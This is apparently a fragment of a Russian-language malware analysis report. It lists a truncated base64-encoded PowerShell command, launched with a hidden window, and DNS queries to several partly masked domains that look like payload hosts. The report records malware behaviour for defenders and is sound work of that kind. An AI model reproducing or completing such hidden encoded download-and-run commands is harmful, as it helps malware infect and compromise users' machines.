Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQwBnAHkAcgBuAG0AaQB2ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEgAcwBuAG4AbgBtAHcAaQAgACMAPgAgACQATAByAGQAZAByAHUAcQB4AGcAZwB6AD0AJwBLAGUAYwBsAGYAdgBk...
- DNS ASK s-####rov-mektep.kz
- DNS ASK vi####mfumar.club
- DNS ASK sa####iaschool.in
- DNS ASK ac###olding.ir
- DNS ASK ja##.com.es
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQwBnAHkAcgBuAG0AaQB2ACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEgAcwBuAG4AbgBtAHcAaQAgACMAPgAgACQATAByAGQAZAByAHUAcQB4AGcAZwB6AD0AJwBLAGUAYwBsAGYAdgBk...' (со скрытым окном)